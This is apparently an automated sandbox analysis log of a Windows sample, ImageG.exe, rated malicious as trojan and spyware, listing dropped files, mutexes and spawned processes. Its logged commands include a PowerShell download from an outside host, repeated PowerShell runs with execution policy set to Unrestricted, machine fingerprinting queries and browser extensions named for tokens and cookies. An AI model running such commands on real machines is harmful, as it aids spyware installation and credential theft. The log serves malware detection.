        Source: C:\Users\user\Desktop\ImageG.exe | File dump: ImageG.exe.0.dr 172695040
        Source: C:\Users\user\Desktop\ImageG.exe | File dump: ImageG.exe0.0.dr 172695040
        Source: extensions.zip.2.dr | Zip Entry: extension-tokens/js/background.js
        Source: extensions.zip.2.dr | Zip Entry: extension-tokens/js/bg_obf.js
        Source: extensions.zip.2.dr | Zip Entry: extension-tokens/js/jquery-3.5.1.min.js
        Source: extensions.zip.2.dr | Zip Entry: extension-cookies/scripts/background.js
        Source: initial sample | Static PE information: Filename: ImageG.exe
        Source: C:\Users\user\Desktop\ImageG.exe | Process token adjusted: Security
        Source: libEGL.dll.0.dr | Static PE information: Number of sections : 11 > 10
        Source: libGLESv2.dll.0.dr | Static PE information: Number of sections : 11 > 10
        Source: vulkan-1.dll.0.dr | Static PE information: Number of sections : 11 > 10
        Source: ImageG.exe.0.dr | Static PE information: Number of sections : 15 > 10
        Source: vk_swiftshader.dll.0.dr | Static PE information: Number of sections : 11 > 10
        Source: ImageG.exe0.0.dr | Static PE information: Number of sections : 15 > 10
        Source: ImageG.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid
        Source: classification engine | Classification label: mal100.phis.troj.adwa.spyw.evad.winEXE@325/252@27/26
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | File created: C:\Program Files\Windows NT\TableTextService\ImageG.exe
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe | File created: C:\Users\user\AppData\Roaming\desenamoreis
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9704:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1128:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8788:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10104:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6636:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3380:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1620:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8688:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8360:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5128:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8576:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8712:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5236:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9592:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8624:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9788:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8712:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9960:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1432:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8408:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9404:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3520:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8256:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9536:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1432:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9544:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3380:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8624:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9788:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1620:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5624:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8788:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4648:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6636:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8464:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10056:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9064:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3484:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10108:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3196:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6400:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3520:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6412:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8688:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10232:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6412:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9540:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8436:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8368:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8172:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9424:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2912:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8436:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3196:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2912:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9352:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9260:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9856:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8556:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9960:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3128:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2220:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8644:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9704:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5128:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8556:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8644:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8576:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9928:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3128:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9424:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10056:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8464:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8408:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5952:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9352:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3544:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8368:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9540:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8256:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9544:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9592:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1128:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9404:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9452:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9664:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10232:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9584:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7372:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7292:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4528:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8360:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2220:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9536:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10104:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9664:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9260:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9856:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3544:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3484:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9452:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:10108:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9584:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4648:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3180:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9928:304:WilStaging_02
        Source: C:\Users\user\Desktop\ImageG.exe File created: C:\Users\user\AppData\Local\Temp\nscB204.tmp
        Source: ImageG.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT ExecutablePath FROM Win32_Process WHERE processid=7896
        Source: C:\Windows\System32\cmd.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\System32\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 9048)
        Source: C:\Users\user\Desktop\ImageG.exe File read: C:\Users\desktop.ini
        Source: C:\Users\user\Desktop\ImageG.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Users\user\Desktop\ImageG.exe File read: C:\Users\user\Desktop\ImageG.exe
        Source: unknown Process created: C:\Users\user\Desktop\ImageG.exe "C:\Users\user\Desktop\ImageG.exe"
        Source: C:\Users\user\Desktop\ImageG.exe Process created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "chcp"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=7896 get ExecutablePath"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\wbem\WMIC.exe wmic process where processid=7896 get ExecutablePath
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe "C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\desenamoreis" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1696 --field-trial-handle=1704,i,16015974932036603911,12011319821735698167,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "NET SESSION"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')""
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\net.exe NET SESSION
        Source: C:\Windows\System32\net.exe Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 SESSION
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -
